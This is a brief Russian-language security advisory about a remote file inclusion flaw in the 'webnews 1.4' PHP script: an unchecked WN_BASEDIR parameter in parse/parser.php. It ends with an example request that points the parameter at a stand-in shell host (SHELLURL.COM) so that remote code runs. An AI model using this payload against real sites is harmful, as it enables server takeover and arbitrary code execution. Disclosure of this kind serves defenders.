Программа: webnews 1.4
Обнаруженная уязвимость может быть использована злоумышленником для выполнения произвольного кода. Уязвимость существует из-за того, что данные, передаваемые через параметр "WN_BASEDIR" не правильно обрабатываются в parse/parser.php.
Пример:
htpp://sitename.com[scerpitPath]/parse/parser.php? WN_BASEDIR=http://SHELLURL.COM
